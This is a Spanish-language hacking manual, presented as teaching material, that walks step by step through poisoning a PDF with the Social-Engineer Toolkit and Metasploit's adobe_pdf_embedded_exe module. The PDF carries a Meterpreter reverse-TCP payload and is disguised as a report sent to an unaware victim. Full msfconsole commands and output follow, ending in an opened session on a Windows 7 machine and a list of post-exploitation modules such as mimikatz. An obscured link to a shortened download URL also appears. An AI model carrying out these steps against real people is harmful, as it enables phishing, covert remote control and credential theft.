Está en la página 1de 16

HACKING CON PDF

En esta ocasión mostraré cómo por medio de Kali Linux podremos acceder remotamente utilizando
un archivo .pdf infectado a un equipo Windows víctima. Se utiliza un meterpreter reverse lo cual
nos indica enseña que la conexión se hará de forma inversa luego que la víctima ejecute el archivo
el atacante podrá acceder a su máquina sin que este se dé cuenta.

Lo primero que debemos asegurar es que la víctima pueda estar en la misma red, o que el atacante
pueda tener alcanzabilidad a su víctima.

Imagen 1 – Validación de Dirección IP de la Máquina Atacante

Imagen 2 – Validación de Dirección IP de la Máquina Víctima

Ing. Rafael Sandoval Morales MANUAL DE HACKING


MATERIAL DIDÁCTICO PROPIO CON ENVENENAMIENTO CON ARCHIVO .PDF
a-rafael.sandoval@utch.edu.co / Rafael_sandoval1983@iCloud.com
2022 Página 1 de 16
Probar si existe conectividad de extremo a extremo.

Imagen 3 – Ping Máquina Atacante hacia la Víctima

Imagen 4 – Ping Máquina Víctima hacia el Atacante

Activamos la herramienta setoolkit luego aceptamos con la letra Y activamos la ejecución de la


aplicación.
Ing. Rafael Sandoval Morales MANUAL DE HACKING
MATERIAL DIDÁCTICO PROPIO CON ENVENENAMIENTO CON ARCHIVO .PDF
a-rafael.sandoval@utch.edu.co / Rafael_sandoval1983@iCloud.com
2022 Página 2 de 16
Imagen 5 – Ejecutamos la herramienta y damos clic en Y

Ahora vamos a iniciar el Ataque de Ingeniería Social

Imagen 6 – Escogemos la opción 1 – Social-Engineering Attacks

Ing. Rafael Sandoval Morales MANUAL DE HACKING


MATERIAL DIDÁCTICO PROPIO CON ENVENENAMIENTO CON ARCHIVO .PDF
a-rafael.sandoval@utch.edu.co / Rafael_sandoval1983@iCloud.com
2022 Página 3 de 16
Imagen 7 – Escogemos la opción 1 – Spear-Phishing Attack Vectors

Vamos a crear un archivo que tenga un Payload infectado para enviarlo a la víctima.

Imagen 8 – Create a FileFormat Payload


Ing. Rafael Sandoval Morales MANUAL DE HACKING
MATERIAL DIDÁCTICO PROPIO CON ENVENENAMIENTO CON ARCHIVO .PDF
a-rafael.sandoval@utch.edu.co / Rafael_sandoval1983@iCloud.com
2022 Página 4 de 16
Escogemos la opción que realizará el Envenenamiento por medio del archivo .pdf

Imagen 9 – Adobe PDF Embedded EXE Social Engineering

Ahora, vamos a utilizar nuestro archive .pdf que tenemos con la información a enviar a la víctima,
pero en realidad estará infectado.

Imagen 10 – Use your own PDF for attack


Ing. Rafael Sandoval Morales MANUAL DE HACKING
MATERIAL DIDÁCTICO PROPIO CON ENVENENAMIENTO CON ARCHIVO .PDF
a-rafael.sandoval@utch.edu.co / Rafael_sandoval1983@iCloud.com
2022 Página 5 de 16
Debemos de colocar la ruta donde está alojado el archive .pdf que vamos a utilizar inicialmente.

Imagen 11 – Ruta donde está alojado el archivo .pdf a utilizar

Ahora, utilizaremos una conexión reverse dado que necesitamos que la víctima ejecute el archivo
para que nos permita el acceso a la máquina atacante sin problemas.

Imagen 12 – Opción 2 Windows Meterpreter Reverse_TCP


Hay que tener en cuenta que la máquina atacante estará en Modo Listener, ósea en modo escucha.
Ing. Rafael Sandoval Morales MANUAL DE HACKING
MATERIAL DIDÁCTICO PROPIO CON ENVENENAMIENTO CON ARCHIVO .PDF
a-rafael.sandoval@utch.edu.co / Rafael_sandoval1983@iCloud.com
2022 Página 6 de 16
Debemos escribir la dirección IP del Atacante.

Imagen 13 – Escribir la IP del Atacante

Ahora, debemos escribir el Puerto que utilizará el Atacante para su conexión, y damos Enter

Imagen 14 – Escribir el Puerto TCP/UDP del Atacante

Nos pide que utilicemos el mismo nombre o cambiar el nombre del archivo. Esta parte es a
consideración del interesado. En este caso, vamos a Renombra el nombre del archivo.

Imagen 15 – Opción 2 Rename the file, I want to be cool.

Ing. Rafael Sandoval Morales MANUAL DE HACKING


MATERIAL DIDÁCTICO PROPIO CON ENVENENAMIENTO CON ARCHIVO .PDF
a-rafael.sandoval@utch.edu.co / Rafael_sandoval1983@iCloud.com
2022 Página 7 de 16
Coloque el nombre de Informe.pdf o el que ud deseé, la aplicación me brinda opciones de enviar el
archivo directamente a los destinatarios al correo electrónicos de ellos. En este caso, no lo haremos.
(si desea realizarlo, por favor ejecutar las instrucciones y continuar con el proceso).

Imagen 16 – Escribir el nuevo nombre del archive a enviar

Luego de crear el archivo, observamos que no se encuentra en alojado en el Escritorio, por ende,
debemos utilizar técnicas de búsqueda en sistemas operativos Linux. Una de ellas es el siguiente
comando el cual, lo puede utilizar para buscar un archivo que esté en su sistema operativo, pero ud
no sabe dónde lo dejo alojado. find / -type f -name Informe.pdf

Imagen 17 – Línea de comando para búsqueda de cualquier archivo

Ubicación de la ruta del archivo

Imagen 18 – Ubicación del Archivo

Ahora, enviarle el archivo a la víctima para que ella lo descargue.


Ejecutamos msfconsole en otra Shell del Kali
Ing. Rafael Sandoval Morales MANUAL DE HACKING
MATERIAL DIDÁCTICO PROPIO CON ENVENENAMIENTO CON ARCHIVO .PDF
a-rafael.sandoval@utch.edu.co / Rafael_sandoval1983@iCloud.com
2022 Página 8 de 16
Imagen 19 – Ejecutamos msfconsole

Buscamos handler

Imagen 19 – Buscar handler

Ing. Rafael Sandoval Morales MANUAL DE HACKING


MATERIAL DIDÁCTICO PROPIO CON ENVENENAMIENTO CON ARCHIVO .PDF
a-rafael.sandoval@utch.edu.co / Rafael_sandoval1983@iCloud.com
2022 Página 9 de 16
Luego que nos arroja todos los posibles exploit con el nombre handler, debemos de buscar el
llamado exploit/multi/handler

Imagen 20 – Buscar exploit/multi/handler

Ahora usamos ese exploit para iniciar nuestra configuración para atacar la máquina de la víctima.

Imagen 21 – use exploit/multi/handler

Aplicamos el set payload windows/meterpreter/reverse_tcp al exploit para que se pueda ejecutar el


metasploit reverse entre la víctima y el atacante.

Imagen 22 – set payload windows/meterpreter/reverse_tcp

Ing. Rafael Sandoval Morales MANUAL DE HACKING


MATERIAL DIDÁCTICO PROPIO CON ENVENENAMIENTO CON ARCHIVO .PDF
a-rafael.sandoval@utch.edu.co / Rafael_sandoval1983@iCloud.com
2022 Página 10 de 16
Debemos escribir la dirección del Atacante y el Puerto utilizado para el ataque. (deben ser los
mismos que utilizó anteriormente en la herramienta setoolkit.

Imagen 23 – Datos del atacante

LHOST = IP del Atacante


LPORT = Puerto del Atacante

Imagen 24 – LHOST vs LPORT del Atacante

Se puede validar si los datos ingresados se encuentran configurados.

Imagen 25 – LHOST vs LPORT del Atacante


Aplicamos un run para dejar la máquina atacante en listener ósea en modo escucha.
Ing. Rafael Sandoval Morales MANUAL DE HACKING
MATERIAL DIDÁCTICO PROPIO CON ENVENENAMIENTO CON ARCHIVO .PDF
a-rafael.sandoval@utch.edu.co / Rafael_sandoval1983@iCloud.com
2022 Página 11 de 16
Imagen 26 – Modo Escucha

https://www.youtube.com/redirect?
event=comments&redir_token=QUFFLUhqblNOQmY4OEpiY0x0ZlB3ZmVkM0NYcy1JWVJ1Q
XxBQ3Jtc0ttZUJMeks5SFR6RDlOZ3RxMGJHWTZDa1hWbmJ5LUN1Nld3UFU2aDJULUs1Nn
NmUVJDcXZuYjNaRzI4ODgycTRPeldfa2hnYlctQnNTZTc0NzlfaHNiaHBfdEMzMWdGdUE0R
0dqM3hxTW9QNk0xVm4xYw&q=https%3A%2F%2Fexe.io
%2FnnL81m&stzid=UgyvT6vjvaibNWEdTJN4AaABAg

msf5 > search pdf_emb

Matching Modules
================

# Name Disclosure Date Rank Check Description


- ---- --------------- ---- ----- -----------
0 exploit/windows/fileformat/adobe_pdf_embedded_exe 2010-03-29 excellent No
Adobe PDF Embedded EXE Social Engineering
1 exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs 2010-03-29 excellent No
Adobe PDF Escape EXE Social Engineering (No JavaScript)

msf5 > use exploit/windows/fileformat/adobe_pdf_embedded_exe


msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > info

Name: Adobe PDF Embedded EXE Social Engineering


Module: exploit/windows/fileformat/adobe_pdf_embedded_exe
Platform: Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2010-03-29

Provided by:
Colin Ames <amesc@attackresearch.com>
jduck <jduck@metasploit.com>

Available targets:
Id Name
-- ----
0 Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English)

Ing. Rafael Sandoval Morales MANUAL DE HACKING


MATERIAL DIDÁCTICO PROPIO CON ENVENENAMIENTO CON ARCHIVO .PDF
a-rafael.sandoval@utch.edu.co / Rafael_sandoval1983@iCloud.com
2022 Página 12 de 16
Check supported:
No

Basic options:
Name Current Setting Required
Description
---- --------------- -------- -----------
EXENAME no The Name
of payload exe.
FILENAME evil.pdf no The
output filename.
INFILENAME /usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf
yes The Input PDF filename.
LAUNCH_MESSAGE To view the encrypted content please tick the "Do not show this message
again" box and press Open. no The message to display in the File: area

Payload information:
Space: 2048

Description:
This module embeds a Metasploit payload into an existing PDF file.
The resulting PDF can be sent to a target as part of a social
engineering attack.

References:
https://cvedetails.com/cve/CVE-2010-1240/
OSVDB (63667)
http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/
http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/
http://blog.didierstevens.com/2010/03/29/escape-from-pdf/
http://www.adobe.com/support/security/bulletins/apsb10-15.html

msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set infilename


/root/Escritorio/EIGRP-Definitivo.pdf
infilename => /root/Escritorio/EIGRP-Definitivo.pdf
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set filename
InformeEIGRP2022.pdf
filename => InformeEIGRP2022.pdf
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > ifconfig
[*] exec: ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500


inet 192.168.100.6 netmask 255.255.255.224 broadcast 192.168.100.31
inet6 fe80::a00:27ff:fed5:9b66 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:d5:9b:66 txqueuelen 1000 (Ethernet)
RX packets 183 bytes 25841 (25.2 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 143 bytes 76915 (75.1 KiB)
Ing. Rafael Sandoval Morales MANUAL DE HACKING
MATERIAL DIDÁCTICO PROPIO CON ENVENENAMIENTO CON ARCHIVO .PDF
a-rafael.sandoval@utch.edu.co / Rafael_sandoval1983@iCloud.com
2022 Página 13 de 16
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536


inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 28 bytes 1476 (1.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 28 bytes 1476 (1.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > show options

Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe):

Name Current Setting Required


Description
---- --------------- -------- -----------
EXENAME no The Name
of payload exe.
FILENAME InformeEIGRP2022.pdf no
The output filename.
INFILENAME /root/Escritorio/EIGRP-Definitivo.pdf
yes The Input PDF filename.
LAUNCH_MESSAGE To view the encrypted content please tick the "Do not show this message
again" box and press Open. no The message to display in the File: area

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description


---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

**DisablePayloadHandler: True (no handler will be created!)**

Exploit target:

Id Name
-- ----
0 Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English)

msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LHOST 192.168.100.6


LHOST => 192.168.100.6
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit
Ing. Rafael Sandoval Morales MANUAL DE HACKING
MATERIAL DIDÁCTICO PROPIO CON ENVENENAMIENTO CON ARCHIVO .PDF
a-rafael.sandoval@utch.edu.co / Rafael_sandoval1983@iCloud.com
2022 Página 14 de 16
[*] Reading in '/root/Escritorio/EIGRP-Definitivo.pdf'...
[*] Parsing '/root/Escritorio/EIGRP-Definitivo.pdf'...
[*] Using 'windows/meterpreter/reverse_tcp' as payload...
[+] Parsing Successful. Creating 'InformeEIGRP2022.pdf' file...
[+] InformeEIGRP2022.pdf stored at /root/.msf4/local/InformeEIGRP2022.pdf
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) >
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.100.6
LHOST => 192.168.100.6
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description


---- --------------- -------- -----------

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description


---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.100.6 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.100.6:4444


[*] Sending stage (180291 bytes) to 192.168.100.9
[*] Meterpreter session 1 opened (192.168.100.6:4444 -> 192.168.100.9:58054) at 2022-05-10
11:46:33 -0300

meterpreter > sysinfo


Computer : MV-WIN7-2021
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : es_CO
Domain : WORKGROUP
Ing. Rafael Sandoval Morales MANUAL DE HACKING
MATERIAL DIDÁCTICO PROPIO CON ENVENENAMIENTO CON ARCHIVO .PDF
a-rafael.sandoval@utch.edu.co / Rafael_sandoval1983@iCloud.com
2022 Página 15 de 16
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > load -l
espia
extapi
incognito
kiwi
lanattacks
mimikatz
peinjector
powershell
priv
python
sniffer
stdapi
unhook
winpmem
meterpreter > help

Ing. Rafael Sandoval Morales MANUAL DE HACKING


MATERIAL DIDÁCTICO PROPIO CON ENVENENAMIENTO CON ARCHIVO .PDF
a-rafael.sandoval@utch.edu.co / Rafael_sandoval1983@iCloud.com
2022 Página 16 de 16

También podría gustarte